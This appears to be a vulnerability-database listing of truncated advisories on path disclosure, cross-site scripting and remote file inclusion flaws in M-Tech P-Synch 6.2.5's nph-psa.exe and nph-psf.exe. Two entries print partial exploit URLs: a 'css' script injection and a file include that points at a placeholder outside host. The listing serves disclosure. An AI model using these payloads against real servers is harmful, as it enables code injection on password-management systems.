M-TECH P-Synch 6.2.5 Path Disclosure Vulnerability

No description provided by source. source: http://www.securityfocus.com/bid/7740/info Reportedly an attacker may make a malicious HTTP request for specific P-Synch executables passing an empty URI parameter to trigger the condition. Although unconfirmed, it is likely that the request will cause...

M-TECH P-Synch 6.2.5 nph-psa.exe css Parameter Remote File Inclusion

No description provided by source. source: http://www.securityfocus.com/bid/7747/info A remote file include vulnerability has been reported for P-Synch. Due to insufficient sanitization of some user-supplied URI variables, it is possible for a remote attacker to include a malicious file in a URL...

M-TECH P-Synch 6.2.5 nph-psf.exe css Parameter XSS

No description provided by source. source: http://www.securityfocus.com/bid/7745/info P-Synch does not adequately filter HTML code from URL parameters, making it prone to cross-site scripting attacks. Code will be executed in the security context of the system running P-Synch. This may enable a...

M-TECH P-Synch 6.2.5 nph-psa.exe css Parameter XSS

No description provided by source. source: http://www.securityfocus.com/bid/7745/info P-Synch does not adequately filter HTML code from URL parameters, making it prone to cross-site scripting attacks. Code will be executed in the security context of the system running P-Synch. This may enable a...

M-TECH P-Synch 6.2.5 nph-psf.exe css Parameter Remote File Inclusion

No description provided by source. source: http://www.securityfocus.com/bid/7747/info A remote file include vulnerability has been reported for P-Synch. Due to insufficient sanitization of some user-supplied URI variables, it is possible for a remote attacker to include a malicious file in a URL...

P-Synch Password Management Multiple Vulnerabilities

The remote web server is running P-Synch, a password management system running over HTTP. There is a flaw in the CGIs nph-psa.exe and nph-psf.exe which may allow an attacker to make this host include remote files, disclose the path to the p-synch installation or produce arbitrary HTML code...

P-Synch < 6.2.5 - Multiple Vulnerabilities

P-Synch Multiple Vulnerabilities Vendor: M-Tech Identity Management Solutions Product: P-Synch Version: VBScript, JScript etc https://path/to/psynch/nph-psa.exe?css="VBScript, JScript etc File Include Vulnerability: https://path/to/psynch/nph-psf.exe?css=http://somesite/file...

P-Synch 6.2.5 - Multiple Vulnerabilities

P-Synch 6.2.5 - Multiple Vulnerabilities P-Synch Multiple Vulnerabilities Vendor: M-Tech Identity Management Solutions Product: P-Synch Version: VBScript, JScript etc https://path/to/psynch/nph-psa.exe?css="VBScript, JScript etc File Include Vulnerability:...

Multiple Vulnerabilities In P-Synch Password Management

Multiple Vulnerabilities In P-Synch Password Management ------------------------------------------------------- The other night I came across a server running P-Synch. I had never heard of it so i was curious to poke around on it a bit. Within an hour i found the vulns listed below. Im pretty sur...

M-TECH P-Synch 6.2.5 - 'nph-psa.exe?css' Cross-Site Scripting

source: https://www.securityfocus.com/bid/7745/info P-Synch does not adequately filter HTML code from URL parameters, making it prone to cross-site scripting attacks. Code will be executed in the security context of the system running P-Synch. This may enable a remote attacker to steal cookie-bas...

M-TECH P-Synch 6.2.5 - Full Path Disclosure

source: https://www.securityfocus.com/bid/7740/info Reportedly an attacker may make a malicious HTTP request for specific P-Synch executables passing an empty URI parameter to trigger the condition. Although unconfirmed, it is likely that the request will cause P-Sync to display an error message...

M-TECH P-Synch 6.2.5 - nph-psf.exe?css Cross-Site Scripting

M-TECH P-Synch 6.2.5 - nph-psf.exe?css Cross-Site Scripting source: https://www.securityfocus.com/bid/7745/info P-Synch does not adequately filter HTML code from URL parameters, making it prone to cross-site scripting attacks. Code will be executed in the security context of the system running...

M-TECH P-Synch 6.2.5 - Full Path Disclosure

M-TECH P-Synch 6.2.5 - Full Path Disclosure source: https://www.securityfocus.com/bid/7740/info Reportedly an attacker may make a malicious HTTP request for specific P-Synch executables passing an empty URI parameter to trigger the condition. Although unconfirmed, it is likely that the request wi...

M-TECH P-Synch 6.2.5 - 'nph-psf.exe?css' Remote File Inclusion

source: https://www.securityfocus.com/bid/7747/info A remote file include vulnerability has been reported for P-Synch. Due to insufficient sanitization of some user-supplied URI variables, it is possible for a remote attacker to include a malicious file in a URL. An attacker may exploit this by...